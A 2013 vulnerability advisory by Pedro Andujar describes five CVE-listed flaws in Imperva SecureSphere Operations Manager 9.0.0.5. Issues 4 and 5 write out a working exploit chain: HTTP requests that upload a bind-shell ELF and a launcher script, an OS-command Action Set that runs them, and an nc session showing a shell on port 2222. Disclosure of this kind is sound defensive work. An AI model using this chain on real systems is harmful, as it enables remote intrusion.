-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathImperva-SecureSphere.OptMgr.txt
263 lines (184 loc) · 13.6 KB
/
Imperva-SecureSphere.OptMgr.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
===============================
- Advisory -
===============================
Tittle: Imperva SecureSphere Operations Manager - Multiple Issues
Risk: High
Date: 27.May.2013
Author: Pedro Andujar
Twitter: @pandujar
.: [ INTRO ] :.
SecureSphere Operations Manager (SOM) is a multi-domain, federated management solution that dramatically improves the operational
efficiency of managing SecureSphere deployments with multiple MX Management Servers. SOM meets the operational scalability
demands of large enterprises and Managed Security Service Providers by consolidating the management, visibility and reporting
across multiple SecureSphere MX Management Servers, and provides system wide health metrics and statistics.
.: [ TECHNICAL DESCRIPTION ] :.
Imperva SecureSphere Operations Manager version 9.0.0.5 Enterprise Edition and probably others are prone to several security issues
as described below;
.: [ ISSUE #1 ] :.
Name: Autocomplete atribute not disabled in login page
Severity: Low
CVE: CVE-2013-4091
AUTOCOMPLETE is not disabled on the /secsphLogin.jsp page. This prevents the web browser specifically caching the username and j_password fields.
<tr> <td style="width: 120px"> <h1 class="login">User:</h1> </td> <td>
<input size=30 id="username" type='text' name='j_username' style="width:172px" value="andujarp" />
<script>document.getElementById("username").focus()</script>
</td> </tr> <tr>
<td style="width: 120px">
<h1 class="login">Password:</h1>
</td> <td>
<input size=30 type='password' name='j_password' style="width:172px"/>
.: [ ISSUE #2 ] :.
Name: Sensitive information is passed as parameter in URL
Severity: Low
CVE: CVE-2013-4092
As part of the login process, the assigned session ID is revealed as a URL parameter.
GET /SecureSphere/secsphLogin.jsp;jsessionid=8B4AE9F3C99049824D4AEBBF61DEF6A5 HTTP/1.1
Additionally, the some credentials are revealed as a URL parameter when trying to get the details of a sensor device:
GET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773&j_username=SOM-user&remote_login_attempt=true&active_mom_user=andujarp
.: [ ISSUE #3 ] :.
Name: Physical Path Disclosure
Severity: Low
CVE: CVE-2013-4093
The SecureSpere web application discloses sensitive system information, including file path information, through its exposed functionality.
Specifically, the /SecureSphere/dwr/call/plaincall/AsyncOperationsContainer.getOperationState.dwr url resource shows the internal
root path of the underlying Application Server;
HTTP/1.1 200 OK
Content-type: text/javascript;charset=utf-8
Content-Length: 554
Date: Thu, 25 Oct 2013 04:41:38 GMT
Server: NA
throw 'allowScriptTagRemoting is false.';
//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1=[];s0['file_size']="412
KB";s0.filePath="/opt/SecureSphere/server/SecureSphere/jakarta-tomcat-secsph/webapps/SecureSphere/WEB-INF/reptempt/25CB2F79E342E89AD9A7CFF51AA17F10/1338152502622932642/export.imf"
See also ISSUE #4, where additional file path disclosure occurs.
.: [ ISSUE #4 ] :.
Name: Insufficients checks on file upload
Severity: High
CVE: CVE-2013-4094
The SecureSpere web application file upload functionality from the .Key Management. section doesn't provide an adequate security control of the uploaded
files, thus allowing an external attacker to upload arbitraty content into the server. This can be used as an attacker in combination with additional
vulnerabilities in the application to compromise the Host.
When trying to upload an invalid file in the Key Management section, the application shows the full internal path of the application server. Additionally,
it effectively uploads the file, despite being a wrong filetype.
The example below shows the file upload functionality outputting an error when the file gets uploaded, additionally revelaing the upload filename and its
internal path within the system. A Linux x86_64 ELF port 2222 bind shell and additional shell script are uploaded to /var/tmp dir:
POST /SecureSphere/plain/settings.html?__targetView=details&extraParams[Key]=T/keyManagement HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://x.x.x.x:8083/SecureSphere/ui/main.html
Cookie: JSESSIONID=CBAD5B77716363AFC961614AC32CAD4D
Content-Type: multipart/form-data; boundary=---------------------------6997088307399657971245517506
Content-Length: 1011
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="def_name"
default_key_pair_fips_2
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="private_key"; filename="bndsh"
Content-Type: application/octet-stream
ELF > x@@@8 @@$ j)Xj _j ^HR $ ziHj Zj1Xj2XH1j+XHj ^Hj!Xuj;XH/bin/shSHRWH
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="public_key"; filename="script"
Content-Type: application/octet-stream
file file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file ; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf target.file
-----------------------------6997088307399657971245517506
Content-Disposition: form-data; name="password"
12321323
-----------------------------6997088307399657971245517506----------------------------------------------------
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Language: en
Content-Length: 315
Date: Fri, 26 Oct 2012 04:38:17 GMT
Server: NA
<errors> <global-errors> <global-error path="page">
An error occurred while importing keys: Failed to load PEM key from '/var/tmp/com.mprv.secsph.utils.io1217840423292804321upload.file'..</global-error>
</global-errors> <field-errors> </field-errors> </errors>
.: [ ISSUE #5 ] :.
Name: Insufficients checks on Action Set (OS command)
Severity: High
CVE: CVE-2013-4095
The SecureSphere web applicaiton allows users to create Action Sets via the Policies sub menu. Action Sets are components used to define the actions taken
by SecureSphere when specific conditions are met. Action sets include session blocks, SNMP traps, sys-tem logs, email, FTP Archive, OS Command, etc. An
attacker can control the execution of commands by creating a task, setting an OS command action on assignee change and cycling through commands by continuous
modification of the task assignee. The OS command action allows the user to supply very limited commands and arguments to the server host and have these
commands executed within the context of the .mxserver. user. The application host is running a modified version of Red Hat Linux, with many networking and
scripting tools installed by default. Due to insufficient host hardening and application sandboxing, an attacker is able to execute commands. Combining the
file upload vulnerability explained in issue 4, an attacker can copy backdoor into the server filesystem and get it executed through this issue, opening a
shell access to the host as the .mxserver. user. The attacker is able to use this foothold into the host to elevate privileges, view and modify source code,
obtain system and application credentials, etc.
POST /SecureSphere/plain/actionsets.html HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.4.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
preffered_encoding: utf-8
Referer: https://x.x.x.x:8083/SecureSphere/ui/main.html
Content-Length: 5223
Cookie: JSESSIONID=ABD89957C38AD685A881670E31A7BF1A
Pragma: no-cache
Cache-Control: no-cache
__targetView=details¤tState=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].momSettingsComponent.addToNewMxs=true
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionInterface=E/secsph/action-interface\0x5B@dn=\0x27OsCommandAI\0x27\0x5D
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].name=rvshell&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map
[5143764432078707607].actionParams.ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions.map[5143764432078707607]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\
0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map
[command].value=/usr/bin/find
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,
actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[command]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\
0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[command].name=command&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map
[5143764432078707607].actionParams.parameters.map
[arguments].value=-name file\* -exec sh {} \;
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\
0x5D,actions.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[arguments]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\
0x5D].actions.map[5143764432078707607].actionParams.parameters.map[arguments].name=arguments&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map
[workingDir].value=/var/tmp
&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions.map[5143764432078707607].actionParams&data
[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir].parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B
@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[workingDir]&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[workingDir]
.name=workingDir&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].value=true&data[actionsets][/secsph/action-set\0x5B
@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D,actions
.map[5143764432078707607].actionParams&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways]
.parameterMetadata=E/secsph/generic-action-interface-metadata\0x5B@dn=\0x27OsCommand\0x27\0x5D,interfaceParameters.map[shouldRunAlways]&data[actionsets][/secsph/action-set\0x5B@dn=
\0x271914115513\0x27\0x5D].actions.map[5143764432078707607].actionParams.parameters.map[shouldRunAlways].name=shouldRunAlways&data[actionsets][/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D]
.actions.map[5143764432078707607].ownerTable=E/secsph/action-set\0x5B@dn=\0x271914115513\0x27\0x5D&_=
In the example above, we have set an event action-set, and as soon the event happens it will launch the predefined action (/usr/bin/find . -exec sh {})
which will execute sh over all the files existing in /var/tmp. As we were able to upload arbitrary content within the local filesystem by means of the
issue 4, the following script that was previously uploaded will be executed as well:
file file* | grep ELF | awk '{print $1}' | sed -e 's/://' >target.file ; chmod 755 `cat target.file` ; ./`cat target.file` ; rm -rf target.file
The script will find, rename and execute the bind tcp shell that was uploaded before, allowing us to access through an interactive Linux shell in port 2222,
with the privileges of mxserver.
[crg@fogheaven ~]$ nc x.x.x.x 2222
uname -a;id
Linux xxxxx.xxxx.xx 2.6.18-164.15.1.el5.impl #1 SMP Tue Apr 27 20:46:55 IDT 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=502(mxserver)gid=505(mxserver)groups=505(mxservers)
.: [ CHANGELOG ] :.
* 25/Oct/2012: - Audit done, reported to client.
* 27/May/2013: - Sent to Imperva.
* 02/Jun/2013: - Public Disclosure.
.: [ SOLUTIONS ] :.
N/A
.: [ REFERENCES ] :.
[+] Imperva SecureSphere Operations Manager
http://www.imperva.com/products/mgt_operations-manager.html
[+] Security Target Document
http://www.niap-ccevs.org/st/st_vid10466-st.pdf
[+] !dSR - Digital Security Research
http://www.digitalsec.net/
-=EOF=-